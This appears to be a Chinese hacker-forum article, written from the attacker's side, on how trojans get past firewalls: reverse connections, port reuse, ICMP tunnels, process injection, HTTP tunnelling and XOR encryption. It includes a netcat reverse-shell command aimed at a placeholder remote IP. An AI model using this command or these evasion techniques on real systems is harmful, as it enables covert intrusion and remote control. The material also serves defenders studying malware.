網(wǎng)絡(luò)不太平,誰上網(wǎng)都會(huì)架起個(gè)firewall來防護(hù)網(wǎng)絡(luò)攻擊,這豈不是給我們木馬的生存帶來了巨大挑戰(zhàn)?
物競天擇,適者生存,嗯...要想生存下去就要穿墻! Bypass Firewall:
1. 首先就是No Firewall(允許本地對(duì)外監(jiān)聽基本上任何端口),沒有防火墻?(這不是廢話?)
對(duì)付這種機(jī)器好辦,隨便哪個(gè)馬一般都行典型代表 Radmin(其實(shí)它不是馬,用的人多了,也就變成了馬,無辜)
rdp 3389/tcp (遠(yuǎn)程桌面,它也不是馬,不過你不用,還有誰用呢?)
2. 端口篩選(只允許外部連接特定端口,也就是外部對(duì)特定端口發(fā)起syn連接請(qǐng)求才被接受,從而完成三次握手,建立連接,否則防火墻丟棄數(shù)據(jù)包,無法完成握手,無法建立連接,也就是木馬不能隨意開個(gè)端口就監(jiān)聽了)
道高一尺,魔高一丈.:
你不讓我連你,我就讓你連我唄, 反彈端口技術(shù)誕生了(一般防火墻對(duì)本地發(fā)起的syn連接請(qǐng)求不會(huì)攔截)
使用工具netcat就可以穿刺這種防火墻 :
nc -e cmd.exe 遠(yuǎn)程ip 遠(yuǎn)程監(jiān)聽port
隨后,端口復(fù)用技術(shù)也出現(xiàn)了,復(fù)用防火墻開放的端口:如80,21,445等
典型的后門如hkdoor,ntrookit(作者都是國人yyt_hac )
還有利用無端口協(xié)議來通信,如利用icmp報(bào)文,(Ping就是利用的ICMP協(xié)議的 Echo Request和Echo Reply探測主機(jī)存活)
典型的如pingdoor (Ping由于使用icmp報(bào)文,根本不開放端口,端口篩選也就無可奈何了,但是icmp并無差錯(cuò)控制,所以這種后門的傳輸特性也并不理想,除非自己加上差錯(cuò)控制)
更牛的,就是干脆拋開TCP/IP協(xié)議,木馬自定義協(xié)議進(jìn)行通信,你防火墻能把我怎么樣?哈哈
典型的如ntrootkit采用了自定義協(xié)議技術(shù).
3.應(yīng)用程序篩選.(只允許特定程序訪問網(wǎng)絡(luò))
木馬也不甘落后,自己不能訪問網(wǎng)絡(luò),只好寄人籬下:
進(jìn)程插入技術(shù)誕生了,通常firewall都要允許iexplore.exe,explore.exe,svchost.exe,services.exe等程序訪問網(wǎng)絡(luò),于是木馬便盯上了這些程序.插入...插入再插入
現(xiàn)在的遠(yuǎn)程控制一般都是插入進(jìn)程式,一是隱蔽(沒有自己進(jìn)程),二是穿墻.典型如Bits.dll(替換系統(tǒng)服務(wù)BITS,插入svchost.exe中) 和灰鴿子/PcShare(默認(rèn)插入iexplorer.exe瀏覽器進(jìn)程)等.
4.協(xié)議篩選.
(例如,只允許80端口通過http協(xié)議,這樣那些端口復(fù)用的后門沒有使用http協(xié)議,不幸被防火墻拒之門外.:-)
怎么辦? 暗渡陳倉, 挖隧道: http-tunnel (http隧道)將木馬通信封裝成http數(shù)據(jù)報(bào)進(jìn)行傳輸.
使用這種技術(shù)的有pcshare(使用雙向http隧道傳輸)
5.IP過濾,一般就是化分為本機(jī),局域網(wǎng),廣域網(wǎng)三個(gè)層次,不過木馬也不是吃素的,有些木馬已經(jīng)開始智能化了:
比如,無法連到黑客主機(jī)或者跳板,就搜索本機(jī)的代理設(shè)置,如IE代理設(shè)置,然后代理出去!
可以想象P2P形式的馬也將于不久以后成為可能,這樣木馬和僵尸網(wǎng)絡(luò)的區(qū)別就更小了 呵呵
6. 現(xiàn)在很多防火墻都可以檢測傳輸?shù)拿舾行畔?如用戶口令等,所以抗IDS,抗自動(dòng)分析,這便成了高級(jí)木馬需要考慮的東西,換句話說保護(hù)黑客控制的安全性和隱秘性.典型的解決方法就是采取加密措施,如最簡單的對(duì)付IDS檢測的方法,xor異或加密.
但是現(xiàn)在的防護(hù)墻肯定不是以上技術(shù)的分離,而是一定有多項(xiàng)技術(shù)同時(shí)采用.
同時(shí),綜合利用以上對(duì)抗技術(shù)的木馬也不鮮見了.
木馬和防護(hù)墻 永遠(yuǎn)是一對(duì)矛盾,彼此斗爭,彼此發(fā)展.呵呵